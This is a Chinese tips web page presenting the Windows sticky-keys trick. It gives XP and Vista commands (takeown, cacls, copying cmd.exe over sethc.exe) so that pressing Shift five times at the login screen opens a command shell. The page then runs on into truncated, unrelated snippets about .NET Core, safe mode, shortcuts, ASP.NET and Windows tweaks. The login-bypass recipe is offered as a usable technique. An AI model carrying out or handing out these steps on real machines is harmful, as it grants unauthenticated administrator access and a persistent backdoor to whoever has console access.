WINDOWS漏洞:粘置键_应用技巧

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

时间: 2024-09-15 02:36:42

WINDOWS漏洞:粘置键_应用技巧的相关文章

.NET Core Windows环境安装配置教程_实用技巧

1.安装.NET Core SDK 在windows下开发.NET Core最好使用Visual Studio工具.下载地址与安装: VS2015最新版本:Visual Studio 2015 Update 3* VS环境下的.Net Core:.NET Core 1.0 for Visual Studio 对应下载的文件DotNetCore.1.0.0-VS2015Tools.Preview2.exe .Net Core安装过程(安装过程比较慢,亲们耐心等待): (安装慢,等待中--.) (O

资料:8种Windows安全模式解析以及应用_应用技巧

经常使用电脑的人可能都听说过,当电脑出了故障时,Windows会提供一个名为"安全模式"的平台,在这里用户能解决很多问题--不管是硬件(驱动)还是软件的.然而你会使用这个安全模式么?今天我们就来带您认识一下它的真面目. 初识安全模式 要进入安全模式,只要在启动时不停地按F8,就会出现选项菜单,再用键盘上的上下光标键进行选择即可进入不同的启动模式.选项菜单包括了以下几个: 1.安全模式 只使用基本文件和驱动程序.如鼠标(USB串行鼠标除外).监视器.键盘.硬盘.基本视频.默认系统服务等,

高手最常用的五个键盘组合键_应用技巧

winkey+d :这是高手最常用的第一快捷组合键,这个快捷键组合可以将桌面上的所有窗口瞬间最小化,无论是聊天的窗口还是游戏的窗口--只要再次按下这个组合键,刚才的所有窗口都回来了,而且激活的也正是你最小化之前在使用的窗口!  winkey+f :不用再去移动鼠标点"开始→搜索→文件和文件夹"了,在任何状态下,只要一按winkey+f就会弹出搜索窗口. winkey+r :在我们的文章中,你经常会看到这样的操作提示:"点击'开始→运行',打开'运行'对话框--".其

ASP.NET笔记之Session、http、web开发原则、xss漏洞的详细介绍_实用技巧

1.Session 2.验证码 YZM.ashx 复制代码 代码如下: <%@ WebHandler Language="C#" Class="YZM" %> using System;using System.Web; public class YZM : IHttpHandler, System.Web.SessionState.IRequiresSessionState{     public void ProcessRequest (HttpCo

.Net笔记:System.IO之windows文件操作的深入分析_实用技巧

在.Net中处理系统文件相关的几个类分别是File.Directory.FileInfo.DirectoryInfo.DriveInfo.FileSystemWatcher.本文介绍下这几个类的用法.1.File类提供静态方法用来创建.移动.复制.删除文件的操作,并可以打开文件流2.Directory类提供静态方法用来创建.移动.复制.删除目录的操作3.FileInfo类用类实例实现创建.复制.移动.删除文件的操作4.DirectoryInfo提供创建.移动.复制.删除目录的操作,并可以枚举子目

收集整理的ASP的常用内置函数_应用技巧

函数,就是该语言封装了的一个功能块,以方便用户的调用.比如"now()"在VBScript中就是一个能显示出当前日期和时间的函数.至于具体为什么能显示,则是该语言内核所定的,用户只需明白"now()"就是用来能显示日期时间的.那么,我们当前接触的VBScript还有其他什么功能的函数么? 1,日期/时间函数 这些函数包括对"年"."月"."日"."时"."分".&qu

[整理版]ASP常用内置函数_应用技巧

函数,就是该语言封装了的一个功能块,以方便用户的调用.比如"now()"在VBScript中就是一个能显示出当前日期和时间的函数.至于具体为什么能显示,则是该语言内核所定的,用户只需明白"now()"就是用来能显示日期时间的.那么,我们当前接触的VBScript还有其他什么功能的函数么? 1,日期/时间函数这些函数包括对"年"."月"."日"."时"."分".&quo

360屏蔽windows键和系统粘滞键

  1.打开360安全卫士主界面,点击右下角的功能大全旁的更多选项. 2.进入功能大全后在左下角搜索框中输入游戏优化器并搜索这个功能. 3.进入游戏优化器界面后我们可以看到当前可以为游戏进行优化的选项,其中两项就是屏蔽左侧windows键和屏蔽系统粘滞键,这两个就是造成以上情况的原因了,我们可以把这两个都给屏蔽了. 4.优化完毕后再进入游戏再怎么按这两个键也不会把你弹出游戏了~ 注意:在不玩游戏的时候想用到左侧windows键就必须将其恢复,否则还是无效的.

WINDOWS XP终极设置(呕心沥血版)第1/2页_应用技巧

 WINDOWS XP终极设置WINDOWS XP终极设置(呕心沥血版) 声明:以上资料均是从从互联网上搜集整理而来,本人未曾一一测试,所以在改动时要小心,做好备份,有备无患么,呵呵. 一.系统优化设置. 1.删除Windows强加的附件:  1) 用记事本NOTEPAD修改\winnt\inf\sysoc.inf,用查找/替换功能,在查找框中输入,hide(一个英文逗号紧跟hide),将"替换为"框设为空.并选全部替换,这样,就把所有的,hide都去掉了, 2) 存盘退出, 3)再运